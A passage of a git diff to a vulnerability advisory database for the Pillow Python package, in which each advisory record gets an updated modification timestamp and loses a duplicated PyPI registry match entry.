"upstream": [ "CVE-2016-2533", "GHSA-3c5c-7235-994j", @@ -54,13 +54,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2016-3076.json b/advisories/BREW-pillow-CVE-2016-3076.json index 25effbe155..e24c57d1cc 100644 --- a/advisories/BREW-pillow-CVE-2016-3076.json +++ b/advisories/BREW-pillow-CVE-2016-3076.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2016-3076", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2016-3076", "GHSA-v9pc-9mvp-x87g", @@ -54,13 +54,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2016-4009.json b/advisories/BREW-pillow-CVE-2016-4009.json index ceac883f2c..edb7b61f6c 100644 --- a/advisories/BREW-pillow-CVE-2016-4009.json +++ b/advisories/BREW-pillow-CVE-2016-4009.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2016-4009", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2016-4009", "GHSA-hvr8-466p-75rh", @@ -54,13 +54,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2016-9189.json b/advisories/BREW-pillow-CVE-2016-9189.json index 4610a982a1..130ed7ddfe 100644 --- a/advisories/BREW-pillow-CVE-2016-9189.json +++ b/advisories/BREW-pillow-CVE-2016-9189.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2016-9189", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2016-9189", "GHSA-rwr3-c2q8-gm56", @@ -54,13 +54,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2016-9190.json b/advisories/BREW-pillow-CVE-2016-9190.json index 84fbc6ba7a..73bb3353b3 100644 --- a/advisories/BREW-pillow-CVE-2016-9190.json +++ b/advisories/BREW-pillow-CVE-2016-9190.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2016-9190", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2016-9190", "GHSA-w4vg-rf63-f3j3", @@ -54,13 +54,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2019-16865.json b/advisories/BREW-pillow-CVE-2019-16865.json index b5d6e23be4..7930f47c22 100644 --- a/advisories/BREW-pillow-CVE-2019-16865.json +++ b/advisories/BREW-pillow-CVE-2019-16865.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2019-16865", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2019-16865", "GHSA-j7mj-748x-7p78", @@ -54,13 +54,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2019-19911.json b/advisories/BREW-pillow-CVE-2019-19911.json index e243d95ac4..74da4f33c4 100644 --- a/advisories/BREW-pillow-CVE-2019-19911.json +++ b/advisories/BREW-pillow-CVE-2019-19911.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2019-19911", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2019-19911", "GHSA-5gm3-px64-rw72", @@ -54,13 +54,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-10177.json b/advisories/BREW-pillow-CVE-2020-10177.json index f09a9291da..2674419749 100644 --- a/advisories/BREW-pillow-CVE-2020-10177.json +++ b/advisories/BREW-pillow-CVE-2020-10177.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-10177", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-10177", "BIT-pillow-2020-10177", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-10378.json b/advisories/BREW-pillow-CVE-2020-10378.json index 172e078f36..36308a5947 100644 --- a/advisories/BREW-pillow-CVE-2020-10378.json +++ b/advisories/BREW-pillow-CVE-2020-10378.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-10378", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-10378", "BIT-pillow-2020-10378", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-10379.json b/advisories/BREW-pillow-CVE-2020-10379.json index 8d0a81bfc7..8026e11a38 100644 --- a/advisories/BREW-pillow-CVE-2020-10379.json +++ b/advisories/BREW-pillow-CVE-2020-10379.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-10379", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-10379", "BIT-pillow-2020-10379", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-10994.json b/advisories/BREW-pillow-CVE-2020-10994.json index bfc7120104..a2e444c8dc 100644 --- a/advisories/BREW-pillow-CVE-2020-10994.json +++ b/advisories/BREW-pillow-CVE-2020-10994.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-10994", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-10994", "BIT-pillow-2020-10994", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-11538.json b/advisories/BREW-pillow-CVE-2020-11538.json index da494b1947..d13d94e9a1 100644 --- a/advisories/BREW-pillow-CVE-2020-11538.json +++ b/advisories/BREW-pillow-CVE-2020-11538.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-11538", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-11538", "BIT-pillow-2020-11538", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-35653.json b/advisories/BREW-pillow-CVE-2020-35653.json index d210caaae2..0b6b1b177b 100644 --- a/advisories/BREW-pillow-CVE-2020-35653.json +++ b/advisories/BREW-pillow-CVE-2020-35653.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-35653", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-35653", "BIT-pillow-2020-35653", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-35654.json b/advisories/BREW-pillow-CVE-2020-35654.json index c37d4d75a2..d4893b7e7c 100644 --- a/advisories/BREW-pillow-CVE-2020-35654.json +++ b/advisories/BREW-pillow-CVE-2020-35654.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-35654", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-35654", "BIT-pillow-2020-35654", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-35655.json b/advisories/BREW-pillow-CVE-2020-35655.json index 2d808d9f5d..3e95c4c1e5 100644 --- a/advisories/BREW-pillow-CVE-2020-35655.json +++ b/advisories/BREW-pillow-CVE-2020-35655.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-35655", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-35655", "BIT-pillow-2020-35655", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-5310.json b/advisories/BREW-pillow-CVE-2020-5310.json index f63fbd09ab..4051e34cdd 100644 --- a/advisories/BREW-pillow-CVE-2020-5310.json +++ b/advisories/BREW-pillow-CVE-2020-5310.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-5310", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-5310", "BIT-pillow-2020-5310", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-5311.json b/advisories/BREW-pillow-CVE-2020-5311.json index 82f1dbe6bd..d0eca0d6a5 100644 --- a/advisories/BREW-pillow-CVE-2020-5311.json +++ b/advisories/BREW-pillow-CVE-2020-5311.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-5311", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-5311", "BIT-pillow-2020-5311", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-5312.json b/advisories/BREW-pillow-CVE-2020-5312.json index 57733864ef..3bbd11dea8 100644 --- a/advisories/BREW-pillow-CVE-2020-5312.json +++ b/advisories/BREW-pillow-CVE-2020-5312.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-5312", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-5312", "BIT-pillow-2020-5312", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2020-5313.json b/advisories/BREW-pillow-CVE-2020-5313.json index 0af909b288..f520b81822 100644 --- a/advisories/BREW-pillow-CVE-2020-5313.json +++ b/advisories/BREW-pillow-CVE-2020-5313.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2020-5313", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2020-5313", "BIT-pillow-2020-5313", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-23437.json b/advisories/BREW-pillow-CVE-2021-23437.json index caaf7ef894..8ad55685fc 100644 --- a/advisories/BREW-pillow-CVE-2021-23437.json +++ b/advisories/BREW-pillow-CVE-2021-23437.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-23437", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-23437", "BIT-pillow-2021-23437", @@ -56,13 +56,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-25287.json b/advisories/BREW-pillow-CVE-2021-25287.json index 51767bae4c..f67d29bb72 100644 --- a/advisories/BREW-pillow-CVE-2021-25287.json +++ b/advisories/BREW-pillow-CVE-2021-25287.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-25287", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-25287", "BIT-pillow-2021-25287", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-25288.json b/advisories/BREW-pillow-CVE-2021-25288.json index 17fdb6ad6f..91868a8cc4 100644 --- a/advisories/BREW-pillow-CVE-2021-25288.json +++ b/advisories/BREW-pillow-CVE-2021-25288.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-25288", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-25288", "BIT-pillow-2021-25288", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-25289.json b/advisories/BREW-pillow-CVE-2021-25289.json index fe18c6e2e5..9f1592922f 100644 --- a/advisories/BREW-pillow-CVE-2021-25289.json +++ b/advisories/BREW-pillow-CVE-2021-25289.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-25289", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-25289", "BIT-pillow-2021-25289", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-25290.json b/advisories/BREW-pillow-CVE-2021-25290.json index 2a0fbfac29..c3205992ba 100644 --- a/advisories/BREW-pillow-CVE-2021-25290.json +++ b/advisories/BREW-pillow-CVE-2021-25290.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-25290", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-25290", "BIT-pillow-2021-25290", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-25291.json b/advisories/BREW-pillow-CVE-2021-25291.json index 68c15620fe..92dda4d110 100644 --- a/advisories/BREW-pillow-CVE-2021-25291.json +++ b/advisories/BREW-pillow-CVE-2021-25291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-25291", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-25291", "BIT-pillow-2021-25291", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-25292.json b/advisories/BREW-pillow-CVE-2021-25292.json index 26939cd5ee..d32a91526e 100644 --- a/advisories/BREW-pillow-CVE-2021-25292.json +++ b/advisories/BREW-pillow-CVE-2021-25292.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-25292", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-25292", "BIT-pillow-2021-25292", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-25293.json b/advisories/BREW-pillow-CVE-2021-25293.json index abf6e07774..b3f077b9d1 100644 --- a/advisories/BREW-pillow-CVE-2021-25293.json +++ b/advisories/BREW-pillow-CVE-2021-25293.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-25293", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-25293", "BIT-pillow-2021-25293", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-27921.json b/advisories/BREW-pillow-CVE-2021-27921.json index c875605de5..24020110e0 100644 --- a/advisories/BREW-pillow-CVE-2021-27921.json +++ b/advisories/BREW-pillow-CVE-2021-27921.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-27921", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-27921", "BIT-pillow-2021-27921", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-27922.json b/advisories/BREW-pillow-CVE-2021-27922.json index 273e3c6ec2..0baab61cb7 100644 --- a/advisories/BREW-pillow-CVE-2021-27922.json +++ b/advisories/BREW-pillow-CVE-2021-27922.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-27922", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-27922", "BIT-pillow-2021-27922", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-27923.json b/advisories/BREW-pillow-CVE-2021-27923.json index b0dbcd4c4d..2495bef416 100644 --- a/advisories/BREW-pillow-CVE-2021-27923.json +++ b/advisories/BREW-pillow-CVE-2021-27923.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-27923", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-27923", "BIT-pillow-2021-27923", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-28675.json b/advisories/BREW-pillow-CVE-2021-28675.json index 524c8759a6..6877282dad 100644 --- a/advisories/BREW-pillow-CVE-2021-28675.json +++ b/advisories/BREW-pillow-CVE-2021-28675.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-28675", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-28675", "BIT-pillow-2021-28675", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-28676.json b/advisories/BREW-pillow-CVE-2021-28676.json index 256c69bca4..0654309a9d 100644 --- a/advisories/BREW-pillow-CVE-2021-28676.json +++ b/advisories/BREW-pillow-CVE-2021-28676.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-28676", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-28676", "BIT-pillow-2021-28676", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-28677.json b/advisories/BREW-pillow-CVE-2021-28677.json index 1f84e48fe9..137a2aee01 100644 --- a/advisories/BREW-pillow-CVE-2021-28677.json +++ b/advisories/BREW-pillow-CVE-2021-28677.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-28677", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-28677", "BIT-pillow-2021-28677", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-28678.json b/advisories/BREW-pillow-CVE-2021-28678.json index d33a36b96d..cb0e5f1c55 100644 --- a/advisories/BREW-pillow-CVE-2021-28678.json +++ b/advisories/BREW-pillow-CVE-2021-28678.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-28678", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-28678", "BIT-pillow-2021-28678", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2021-34552.json b/advisories/BREW-pillow-CVE-2021-34552.json index a9e4c9c27f..37707a25df 100644 --- a/advisories/BREW-pillow-CVE-2021-34552.json +++ b/advisories/BREW-pillow-CVE-2021-34552.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2021-34552", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2021-34552", "BIT-pillow-2021-34552", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2022-22815.json b/advisories/BREW-pillow-CVE-2022-22815.json index 974738036e..463bb9c27b 100644 --- a/advisories/BREW-pillow-CVE-2022-22815.json +++ b/advisories/BREW-pillow-CVE-2022-22815.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2022-22815", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2022-22815", "BIT-pillow-2022-22815", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - 